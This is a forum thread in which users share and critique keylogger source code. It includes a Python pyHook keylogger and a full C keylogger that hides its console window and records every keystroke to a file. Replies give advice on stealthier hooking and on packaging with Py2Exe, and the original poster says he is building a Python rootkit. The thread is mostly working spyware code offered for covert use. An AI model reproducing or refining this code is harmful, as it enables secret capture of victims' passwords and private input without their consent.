[Python] Simple Keylogger

[Ragehottie]

I recently found this code on github. I wanted to know, is it efficient?  I can't it now or in the next week because I am on vacation. Here is the code:

Code: (python) [Select]

import pyHook

def OnKeyboardEvent(event):

if event.KeyID == 13:
    text = '[Return]'
elif event.KeyID == 165:
    text = '[Alt]'
elif event.KeyID == 8:
    text = '[Back]'
else:
    text = chr(event.Ascii)

fob = open('log.txt', 'a')
fob.write(text)
fob.close()

return True

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
if __name__ == '__main__':
import pythoncom
pythoncom.PumpMessages()


[techb]

I have a better version on my blog. The principle is the same though.

Honesty, something in C/++ would be better. Interpreted languages aren't the best for this kinda thing. Hooking into the DLLs and using the winapi is a better route. This will give obscure results because of encoding errors. Not all the time, but you will get funky chars when using hotkeys or shifts.

[Ragehottie]

Thank you for looking at my messy code and getting it. I am on my phone and can't see my while post. And I wanted it in python because I am writing a rootkit completely in python. But I will look into a c/++ variation.

[frog]

I have a better version on my blog. The principle is the same though.

Honesty, something in C/++ would be better. Interpreted languages aren't the best for this kinda thing. Hooking into the DLLs and using the winapi is a better route. This will give obscure results because of encoding errors. Not all the time, but you will get funky chars when using hotkeys or shifts.

Python and ctypes; that's some good stuff.

[LeXeL]

You should really repost the code and btw thats the normal code when you google python keylogger

[frog]

Here's one that I made just to see if I could produce something.. I took the hooking technique from irongeek's website, which is terribly inefficient as it constantly polls and taxes the CPU. You can try fucking with the delay to try and produce some better results, but I doubt you will find the means. You can't compile this in visual studio; for some reason you can't use old file creation/manipulation syntax, you have to use windows api to make a file if you are using visual studio express or w/e version to compile.

Code: (c) [Select]

// Filename: keylogger.c
// Purpose: basic keylogger
#include <stdio.h>
#include <windows.h>
 
int main() {
    short i;
    short keyState;
    HWND hidden;
    AllocConsole();
    hidden = FindWindow("ConsoleWindowClass", NULL);
    ShowWindow(hidden, 0);
 
    while(1) {
        for(i = 0; i <= 255; i++) {
            keyState = GetAsyncKeyState(i);
            if(keyState == -32767) {
                Sleep(30);
                FILE *file;
                file = fopen("c:/users/frog/desktop/test.txt", "a+");
 
                if(file == NULL) {
                    printf("Error creating file.\n");
                    exit(1);
                }
 
                switch(i) {
                    case VK_SPACE:
                    fputc(' ', file);
                    fclose(file);
                    break;
                    case VK_SHIFT:
                    fputs("\r\n[SHIFT]\r\n", file);
                    fclose(file);
                    break;
                    case VK_RETURN:
                    fputs("\r\n[ENTER]\r\n",file);
                    fclose(file);
                    break;
                    case VK_BACK:
                    fputs("\r\n[BACKSPACE]\r\n",file);
                    fclose(file);
                    break;
                    case VK_TAB:
                    fputs("\r\n[TAB]\r\n",file);
                    fclose(file);
                    break;
                    case VK_CONTROL:
                    fputs("\r\n[CTRL]\r\n",file);
                    fclose(file);
                    break;
                    case VK_DELETE:
                    fputs("\r\n[DEL]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_1:
                    fputs("\r\n[;:]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_2:
                    fputs("\r\n[/?]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_3:
                    fputs("\r\n[`~]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_4:
                    fputs("\r\n[ [{ ]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_5:
                    fputs("\r\n[\\|]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_6:
                    fputs("\r\n[ ]} ]\r\n",file);
                    fclose(file);
                    break;
                    case VK_OEM_7:
                    fputs("\r\n['\"]\r\n",file);
                    fclose(file);
                    break;
                    case 187:
                    fputc('+',file);
                    fclose(file);
                    break;
                    case 188:
                    fputc(',',file);
                    fclose(file);
                    break;
                    case 189:
                    fputc('-',file);
                    fclose(file);
                    break;
                    case 190:
                    fputc('.',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD0:
                    fputc('0',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD1:
                    fputc('1',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD2:
                    fputc('2',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD3:
                    fputc('3',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD4:
                    fputc('4',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD5:
                    fputc('5',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD6:
                    fputc('6',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD7:
                    fputc('7',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD8:
                    fputc('8',file);
                    fclose(file);
                    break;
                    case VK_NUMPAD9:
                    fputc('9',file);
                    fclose(file);
                    break;
                    case VK_CAPITAL:
                    fputs("\r\n[CAPS LOCK]\r\n",file);
                    fclose(file);
                    break;
                    default:
                    fputc(i, file);
                    fclose(file);
                }
            }
        }
    }
    return 0;
}

I know.. it only does caps, however I thought it would be suitable for a thread like this.

[bubzuru]

when using  GetAsyncKeyState() you can check if the shift\capslock key is down and modify the letter, wouldnt be to hard just time consuming

[frog]

It would be logical to make one using a WH_KEYBOARD_LL hooking procedure using SetWindowsHookEx then interpret and translate the scan codes. This method of hooking is a lot easier on the system because it's part of the windows api. The GetAsyncKeystate method is a dirty hack, so I wouldn't waste my time enhancing this abomination whatsoever. All of this can be found on Microsoft's website.

[dillond21]

Is there anyway to program a hooking function or do you have to download the add on for Py.?

[techb]

Is there anyway to program a hooking function or do you have to download the add on for Py.?

Code the hook yourself from scratch in C.

[bubzuru]

Code the hook yourself from scratch in C.

or any language that can access the winapi

[frog]

Python and ctypes; you can hook Windows' .dll's this way. The book 'Gray Hat Python' explains this in detail. Then you could use Py2Exe to make it portable.